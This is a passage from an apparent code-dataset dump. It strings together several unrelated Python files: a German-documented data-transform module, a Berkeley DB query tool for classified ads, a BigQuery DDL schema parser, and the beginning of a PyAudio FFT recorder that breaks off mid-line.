JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n values[\"transform\"] = execute_type_option(values, data)\n\n transform(values, data)\n\n\n@register_transform\ndef compare(values: dict, data: StepData):\n \"\"\"Vergleicht zwei Werte miteinander und führt je nachdem ob =, !=, < oder > die \"transform\"-Typen aus.\n\n Wenn `value_left` gleich `value_right`, führe \"transform\"-Typen aus on_equal durch.\n Wenn `value_left` ungleich `value_right`, führe \"transform\"-Typen aus on_not_equal durch.\n Wenn `value_left` größer `value_right`, führe \"transform\"-Typen aus on_higher durch.\n Wenn `value_left` kleiner `value_right`, führe \"transform\"-Typen aus on_lower durch.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n values[\"transform\"] = execute_type_compare(values, data)\n\n transform(values, data)\n\n\n@register_transform\ndef random_value(values: dict, data: StepData):\n \"\"\"Wählt random einen Wert aus einem Array oder einem Dictionary (zu einem bestimmten Key) aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n if \"array\" in values:\n for key in values[\"new_keys\"]:\n array = data.get_data(values[\"array\"], values, list)\n length = len(array)\n\n rand = randint(0, length - 1)\n new_value = data.format(array[rand], values)\n data.insert_data(key, new_value, values)\n elif \"dict\" in values:\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n new_values = data.get_data(values.get(\"dict\", None), values, dict)\n value = str(data.get_data(key, values))\n length = len(new_values[value])\n\n rand = randint(0, length - 1)\n new_value = data.format(new_values[value][rand], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef convert(values: dict, data: StepData):\n \"\"\"Konvertiert ein Datentyp in einen anderen Datentyp.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n new_type = locate(values[\"to\"])\n for idx, key in data.loop_key(values[\"keys\"], 
values):\n new_key = get_new_keys(values, idx)\n value = new_type(data.get_data(key, values))\n\n data.insert_data(new_key, value, values)\n\n\n@register_transform\ndef sort(values: dict, data: StepData):\n \"\"\"Sortiert Wörter nach dem Alphabet oder Zahlen aufsteigend.\n\n Ist reverse auf True gesetzt, werden die Wörter zu Z nach A sortiert, bzw. Zahlen absteigend.\n Achtung: Sortierung von A nach Z\n [\"Argentina\", \"Canada\", \"Cyprus\", \"Germany\", \"Norway\", \"Schweden\", \"USA\", \"United Kingdom\", \"Z\"]\n \"USA\" ist vor \"United Kingdom\", weil bei \"USA\" der zweite Buchstabe auch groß geschrieben ist.\n Würde dort \"Usa\" statt \"USA\" stehen, wäre \"United Kingdom\" vor \"USA\".\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n value = data.get_data(key, values)\n reverse = data.get_data(values.get(\"reverse\", False), values, bool)\n\n new_value = sorted(value, reverse=reverse)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef most_common(values: dict, data: StepData):\n \"\"\"Sortiert die Wörter nach der Häufigkeit, optional mit Häufigkeit.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n most_c_list = Counter(value).most_common()\n\n if data.get_data(values.get(\"include_count\", False), values, bool):\n new_value = most_c_list\n else:\n new_value = [elm[0] for elm in most_c_list]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef sub_lists(values: dict, data: StepData):\n \"\"\"Extrahiert aus einem Array (Liste) kleinere Arrays (Listen).\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n value = data.get_data(values[\"array_key\"], values)\n\n for sub_list in values[\"sub_lists\"]:\n start = data.get_data(sub_list.get(\"range_start\", 0), values, numbers.Number)\n end = data.get_data(sub_list.get(\"range_end\", -1), values, numbers.Number)\n new_key = get_new_key(sub_list)\n\n new_value = value[start:end]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef to_dict(values: dict, data: StepData):\n \"\"\"Wandelt eine Liste aus Tupeln oder Arrays in ein Dictionary um.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n new_value = dict(value)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef join(values: dict, data: StepData):\n \"\"\"Fügt Elemente einer Liste zu einem String zusammen mit jeweils einem Delimiter dazwischen.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n delimiter = data.format(values.get(\"delimiter\", \"\"), values)\n\n new_value = delimiter.join(value)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef length(values: dict, data: StepData):\n \"\"\"Gibt die Länge von Arrays (Listen), Strings, Tupeln und Dictionaries aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: 
Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n data.insert_data(new_key, len(value), values)\n\n\n@register_transform\ndef remove_from_list(values: dict, data: StepData):\n \"\"\"Bekommt Stopwords und wandelt die jeweiligen Wörter so um, dass Groß- und Kleinschreibung unwichtig ist.\n\n Bekommt eine Stopword-Liste aus der Textdatei resources/stopwords/stopwords.txt und ggf. die bei der Job-Erstellung\n eingegebenen wurden und wandelt die jeweiligen Wörter so um, dass Groß- und Kleinschreibung unwichtig ist.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n to_remove = data.get_data(values.get(\"to_remove\", []), values, list)\n\n if data.get_data(values.get(\"use_stopwords\", False), values, bool):\n try:\n file = resources.get_resource_path(\"stopwords/stopwords.txt\")\n with open(file, \"r\", encoding='utf-8') as f:\n list_stopwords = f.read().splitlines()\n\n to_remove = to_remove + list_stopwords\n except IOError:\n pass\n\n if data.get_data(values.get(\"ignore_case\", False), values, bool):\n to_remove = [r.lower() for r in to_remove]\n new_value = [v for v in value if v.lower() not in to_remove]\n else:\n new_value = [v for v in value if v not in to_remove]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef lower_case(values: dict, data: StepData):\n \"\"\"Jedes Wort in der Liste wird komplett in Kleinbuchstaben geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.lower() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef upper_case(values: dict, data: StepData):\n \"\"\"Jedes Wort in der Liste wird komplett in Großbuchstaben geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.upper() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef capitalize(values: dict, data: StepData):\n \"\"\"Der erste Buchstabe jedes Worts in der Liste wird groß geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.capitalize() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef normalize_words(values: dict, data: StepData):\n \"\"\"Wörter, die öfter vorkommen und unterschiedliche cases besitzen, werden normalisiert.\n\n Eine Liste wird durchlaufen und jedes Wort welches bei zweiten Vorkommen anders geschrieben wurde als das erste\n vorgekommene wird dann so ersetzt, dass es so geschrieben wird wie das zuerst vorgekommene. Z.B. Bundesliga und\n bundesliga. 
Aus bundesliga wird Bundesliga.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n already_there = []\n new_value = []\n for each in value:\n if each.upper() in already_there:\n new_value.append(each.upper())\n elif each.lower() in already_there:\n new_value.append(each.lower())\n elif each.capitalize() in already_there:\n new_value.append(each.capitalize())\n else:\n already_there.append(each)\n new_value.append(each)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef split_string(values: dict, data: StepData):\n \"\"\"Teilt einen String am angegebenen Trennzeichen.\n\n Das Trennzeichen können auch mehrere Zeichen sein. Soll die Groß- und Kleinschreibung des Trennzeichens (delimiter) ignoriert werden, setzte `ignore_case` auf `true`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n delimiter = data.format(values.get(\"delimiter\", \" \"), values)\n new_key = get_new_keys(values, idx)\n\n if data.get_data(values.get(\"ignore_case\", False), values, bool):\n new_value = re.split(delimiter, value, flags=re.IGNORECASE)\n else:\n new_value = re.split(delimiter, value)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef check_key(values: dict, data: StepData):\n \"\"\"Überprüft, ob ein Key vorhanden ist und setzt den dazugehörigen `key` bzw. den `new_keys` auf `true`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in enumerate(values[\"keys\"]):\n try:\n data.get_data(key, values)\n value = True\n except StepKeyError:\n if \"init_with\" in values:\n init = data.deep_format(values[\"init_with\"], values=values)\n data.insert_data(key, init, values)\n\n value = False\n if \"new_keys\" in values:\n data.insert_data(values[\"new_keys\"][idx], value, values)\n","repo_name":"visuanalytics/visuanalytics","sub_path":"src/visuanalytics/analytics/transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":28040,"program_lang":"python","lang":"de","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"15707444685","text":"from bsddb3 import db\nimport re\nimport time\n\ndef pd_get_aid(info):\n info = info.split(',')\n return info[0]\n\ndef get_title(aids,adCursor):\n for aid in aids:\n result = adCursor.set(aid.encode(\"utf-8\"))\n if(result != None):\n ad = str(result[1].decode(\"utf-8\"))\n titleSearch = re.search('(.*)',ad)\n title = titleSearch.group(1)\n print(str(result[0].decode(\"utf-8\")) + \": \" + title)\n\ndef get_ad(aids,adCursor):\n for aid in aids:\n result = adCursor.set(aid.encode(\"utf-8\"))\n if(result != None):\n ad = str(result[1].decode(\"utf-8\"))\n print(str(result[0].decode(\"utf-8\")) + \": \" + ad)\n\ndef dateEqual(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n return d_aids \n else:\n print(\"No Entry found\")\n\ndef dateGreaterEqual(date,daCursor,adCursor,opt):\n result 
= daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n result = daCursor.set_range(date.encode(\"utf-8\"))\n other = daCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = daCursor.next() \n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n top = daCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids\n\ndef dateLess(date,daCursor,adCursor,opt):\n result = daCursor.set_range(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n prev = daCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = daCursor.prev()\n return d_aids\n else:\n print(\"No Entry Found.\")\n\ndef dateGreater(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n dup = daCursor.next_dup()\n while(dup != None):\n dup = daCursor.next_dup()\n other = daCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = daCursor.next()\n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n top = daCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids\n\ndef dateLessEqual(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n result = daCursor.set_range(date.encode(\"utf-8\"))\n prev = daCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = daCursor.prev()\n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n else:\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids \n\ndef priceLess(price,prCursor,adCursor,opt):\n stop_price = (\"{:>20}\".format(price))\n curs = prCursor.first()\n p_aids = []\n \n \n if(curs != None): \n while( curs!= None):\n if curs[0].decode(\"utf-8\") >= stop_price:\n break\n else:\n if pd_get_aid(str(curs[1].decode(\"utf-8\"))) not in p_aids:\n 
p_aids.append(pd_get_aid(str(curs[1].decode(\"utf-8\"))))\n curs = prCursor.next()\n return p_aids \n\ndef priceGreater(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n dup = prCursor.next_dup()\n while(dup != None):\n dup = prCursor.next_dup()\n other = prCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = prCursor.next()\n else:\n top = prCursor.first()\n while(top != None):\n othprice = str(top[0].decode(\"utf-8\"))\n if (othprice > price):\n break\n top = prCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids\n\ndef priceEqual(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n return p_aids \n else:\n return p_aids\n\ndef priceGreaterEqual(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n result = prCursor.set_range(price.encode(\"utf-8\"))\n other = prCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = prCursor.next() \n else:\n top = prCursor.first()\n while(top != None):\n othprice = str(top[0].decode(\"utf-8\"))\n if othprice > price:\n break\n top = prCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids\n\ndef priceLessEqual(price,prCursor,adCursor,opt):\n \n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n \n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n result = prCursor.set_range(price.encode(\"utf-8\"))\n prev = prCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = prCursor.prev()\n else:\n top = prCursor.first()\n while(top != None):\n othprice = (\"{:>20}\".format(str(top[0].decode(\"utf-8\"))))\n if othprice > price:\n break\n else:\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids \n\ndef teQuery(keyword,teCursor,adCursor,opt):\n result = teCursor.set(keyword.encode(\"utf-8\")) \n te_aids = []\n if(result != None):\n 
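# record the first hit, then walk duplicate B-tree entries for this keyword\n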
te_aids.append(str(result[1].decode(\"utf-8\")).split('\\n')[0])\n dup = teCursor.next_dup()\n while(dup != None):\n if str(dup[1].decode(\"utf-8\")).split('\\n')[0] not in te_aids:\n te_aids.append(str(dup[1].decode(\"utf-8\")).split('\\n')[0])\n dup = teCursor.next_dup()\n return te_aids\n else:\n print(\"No Entry Found.\")\n\ndef location(loca,adCursor,opt):\n loca = loca.lower()\n top = adCursor.first()\n loc_aids = []\n while (top != None):\n ad = str(top[1].decode(\"utf-8\"))\n locSearch = re.search('(.*)',ad)\n loc = locSearch.group(1)\n if (loc.lower() == loca):\n loc_aids.append(top[0].decode(\"utf-8\"))\n top = adCursor.next()\n return loc_aids\n\ndef cat(ca,adCursor,opt):\n ca = ca.lower()\n top = adCursor.first()\n ca_aids = []\n while (top != None):\n ad = str(top[1].decode(\"utf-8\"))\n catSearch = re.search('(.*)',ad)\n cat = catSearch.group(1)\n if (cat == ca):\n ca_aids.append(top[0].decode(\"utf-8\"))\n top = adCursor.next()\n return ca_aids\n\ndef part(pte,teCursor,adCursor,opt):\n pte = pte.lower()\n top = teCursor.first()\n pt_aids = []\n while (top != None):\n te = str(top[0].decode(\"utf-8\"))\n pmatch = re.search(str(pte)+'(.*)',te)\n if pmatch:\n if str(top[1].decode(\"utf-8\")).split('\\n')[0] not in pt_aids:\n pt_aids.append(str(top[1].decode(\"utf-8\")).split('\\n')[0])\n top = teCursor.next()\n return pt_aids\n\n\ndef queryType(query,teCursor,daCursor,adCursor,prCursor,opt):\n partQuery = re.match('(.*)%',query)\n dateGreaterEqualQuery = re.match('date>=(.*)',query)\n dateLessEqualQuery = re.match('date<=(.*)',query)\n dateGreaterQuery = re.match('date>(.*)',query)\n dateEqualQuery = re.match('date=(.*)',query)\n dateLessQuery = re.match('date<(.*)',query)\n locationQuery = re.match('location=(.*)',query)\n catQuery = re.match('cat=(.*)',query)\n priceEqualQuery = re.match('price=(.*)',query)\n priceGreaterEqualQuery = re.match('price>=(.*)',query)\n priceLessEqualQuery = re.match('price<=(.*)',query)\n priceGreaterQuery = re.match('price>(.*)',query)\n priceLessQuery = re.match('price<(.*)',query)\n \n if dateLessEqualQuery:\n return dateLessEqual(dateLessEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateEqualQuery:\n return dateEqual(dateEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateGreaterEqualQuery:\n return dateGreaterEqual(dateGreaterEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateLessQuery:\n return dateLess(dateLessQuery.group(1),daCursor,adCursor,opt)\n elif dateGreaterQuery:\n return dateGreater(dateGreaterQuery.group(1),daCursor,adCursor,opt)\n \n elif catQuery:\n return cat(catQuery.group(1),adCursor,opt)\n \n elif locationQuery:\n return location(locationQuery.group(1),adCursor,opt)\n \n elif priceEqualQuery:\n return priceEqual(priceEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceGreaterEqualQuery:\n return priceGreaterEqual(priceGreaterEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceLessEqualQuery:\n return priceLessEqual(priceLessEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceGreaterQuery:\n return priceGreater(priceGreaterQuery.group(1),prCursor,adCursor,opt)\n elif priceLessQuery:\n return priceLess(priceLessQuery.group(1),prCursor,adCursor,opt)\n \n elif partQuery:\n return part(partQuery.group(1),teCursor,adCursor,opt)\n else:\n return teQuery(query,teCursor,adCursor,opt)\n\ndef main():\n adsDB = db.DB()\n termsDB = db.DB()\n pdatesDB = db.DB()\n pricesDB = db.DB()\n adsDB.open('ad.idx',None,db.DB_HASH,db.DB_CREATE)\n termsDB.open('te.idx',None,db.DB_BTREE,db.DB_CREATE)\n 
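# B-tree indexes keep keys sorted, which the date/price range scans above rely on\n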
pdatesDB.open('da.idx',None,db.DB_BTREE,db.DB_CREATE)\n pricesDB.open('pr.idx',None,db.DB_BTREE,db.DB_CREATE)\n\n adCursor = adsDB.cursor()\n teCursor = termsDB.cursor()\n daCursor = pdatesDB.cursor()\n prCursor = pricesDB.cursor()\n\n opt = 0\n \n while(True):\n querys = input(\"Enter query: \") \n \n outSearch = re.search('output=(.*)',querys)\n if outSearch:\n option = outSearch.group(1)\n if option == \"full\":\n opt = 1\n elif option == \"brief\":\n opt = 0\n else:\n print(\"invalid option\")\n break\n else:\n querys = querys.split()\n entries = []\n tr = 0\n for query in querys:\n query = query.lower()\n res = queryType(query,teCursor,daCursor,adCursor,prCursor,opt)\n if (res != []) and (res != None):\n entries.append(res)\n else:\n print(\"no matching entries\")\n tr = 1\n break\n\n if tr == 0:\n if len(entries) != 0:\n final_entries = []\n for i in range(len(entries)):\n for j in range(len(entries[i])):\n ein = 1\n for e in entries:\n if entries[i][j] not in e:\n ein = 0\n break\n if ein == 1:\n if entries[i][j] not in final_entries:\n final_entries.append(entries[i][j])\n if opt == 0:\n get_title(final_entries,adCursor)\n elif opt == 1:\n get_ad(final_entries,adCursor)\n \n\n\n \n adCursor.close()\n teCursor.close()\n daCursor.close()\n prCursor.close()\n adsDB.close()\n termsDB.close()\n pdatesDB.close()\n pricesDB.close()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"phoebebai/CMPUT291-mini-project2","sub_path":"phase3.py","file_name":"phase3.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37445531223","text":"import logging\nimport re\nfrom re import Match\nfrom typing import Dict, List\nfrom common.bigquery_type import BigQueryType\nfrom common.file_reader import read\n\nlogger = logging.getLogger(__name__)\n\n\nclass DDLParser:\n\n def __init__(self, ddl_path):\n ddl: List[str] = read(ddl_path).split(\"\\n\")\n # We only care about the `CREATE TABLE` DDL\n if ddl[0].startswith(\"CREATE SCHEMA\"):\n ddl = ddl[1:]\n\n self._schema: Dict[str, BigQueryType] = self._to_schema(ddl)\n self._fully_qualified_table_name = self._to_fully_qualified_table_name(\n ddl[0]\n )\n\n def get_schema(self) -> Dict[str, BigQueryType]:\n return self._schema\n\n def get_fully_qualified_table_name(self):\n return self._fully_qualified_table_name\n\n @staticmethod\n def _to_fully_qualified_table_name(ddl: str) -> str:\n match: Match = re.search(\"CREATE TABLE `(.*)`\", ddl)\n if match:\n return match.group(1)\n\n @staticmethod\n def _to_schema(ddl: List[str]) -> Dict[str, BigQueryType]:\n ddl = [line.strip() for line in ddl]\n columns_start_index = ddl.index(\"(\")\n\n try:\n columns_end_index = ddl.index(\")\")\n except ValueError:\n try:\n columns_end_index = ddl.index(\");\")\n except ValueError:\n raise ValueError(\n \"Couldn't parse schema file. 
Make sure this file is generated by\"\n \" the response of `fetch_bigquery_table_schema.py`\"\n )\n\n if \"PRIMARY KEY\" in ddl[columns_end_index - 1]:\n columns_end_index -= 1\n\n schema = ddl[columns_start_index + 1 : columns_end_index]\n\n return DDLParser._to_dict(schema)\n\n @staticmethod\n def _to_dict(schema):\n d = {}\n for column in schema:\n column = DDLParser._strip_trailing_comma(column.strip())\n name: str = DDLParser._column_name(column)\n\n if DDLParser._is_metadata_column(name):\n logger.debug(f\"Skipping metadata column {column}\")\n continue\n\n try:\n source_type: BigQueryType = DDLParser._column_schema(column)\n except ValueError:\n raise ValueError(\n \"Expected column description to be in the format of '\"\n f\" <column name> <BigQuery type>' but got: '{column}'\"\n )\n d[name] = source_type\n\n return d\n\n @staticmethod\n def _strip_trailing_comma(s: str):\n return s[:-1] if s[-1] == \",\" else s\n\n @staticmethod\n def _is_metadata_column(column: str):\n return column.startswith(\"_metadata_\") or column == \"datastream_metadata\"\n\n @staticmethod\n def _column_schema(column: str) -> BigQueryType:\n column_schema = column.split()[1:]\n if column_schema[0].startswith(\"NUMERIC\"):\n return BigQueryType.NUMERIC\n elif column_schema[0].startswith(\"BIGNUMERIC\"):\n return BigQueryType.BIGNUMERIC\n elif column_schema[0].startswith(\"STRING\"):\n return BigQueryType.STRING\n else:\n return BigQueryType(column_schema[0])\n\n @staticmethod\n def _column_name(column: str):\n return column.split()[0].strip(\"`\")\n","repo_name":"GoogleCloudPlatform/datastream-bigquery-migration-toolkit","sub_path":"migration_toolkit/sql_generators/copy_rows/ddl_parser.py","file_name":"ddl_parser.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"43471634175","text":"import pyaudio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.lines as line\nimport threading\nimport wave\nimport Queue\nfrom scipy import signal\n\nclass recorder():\n \n def __init__(self):\n self.CHUNK = 4096 \n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 48100\n self.RECORD_SECONDS = 0.1\n self.window = signal.hamming(self.CHUNK)\n self.fig = plt.figure()\n self.real_time_axis = plt.subplot(212,xlim =(0,self.CHUNK),ylim =(-10000,10000)) #creating a plot for real time\n self.real_time_axis.set_title(\"Real Time\")\n self.real_time_line = line.Line2D([],[])\n self.real_time_data = np.arange(0,self.CHUNK,1)\n self.real_time_x_data = np.arange(0,self.CHUNK,1)\n plt.yticks(np.arange(-10000,10000,1000))\n self.fft_axis = plt.subplot(211,xlim =(0,self.CHUNK/2+1),ylim =(1,1000000)) #creating a plot for fft\n self.fft_axis.set_title(\"FFT Time\")\n self.fft_line = line.Line2D([],[])\n self.fft_data = np.arange(0,self.CHUNK/2+1,1)\n self.fft_x_data = np.arange(0,self.CHUNK/2+1,1)\n plt.xticks(np.arange(0,self.CHUNK/2+1, 100))\n plt.axis([0,500,1,1000000])\n \n#Real time plotting on the graph \n def plot_ini(self):\n self.real_time_axis.add_line(self.real_time_line)\n self.fft_axis.add_line(self.fft_line)\n return self.fft_line,self.real_time_line\n \n def plot_up(self,frame):\n self.real_time_line.set_xdata(self.real_time_x_data)\n self.real_time_line.set_ydata(self.real_time_data)\n self.fft_line.set_xdata(self.fft_x_data)\n self.fft_line.set_ydata(self.fft_data)\n return self.fft_line, self.real_time_line\n \n def anim(self):\n self.ani = animation.FuncAnimation(self.fig, 
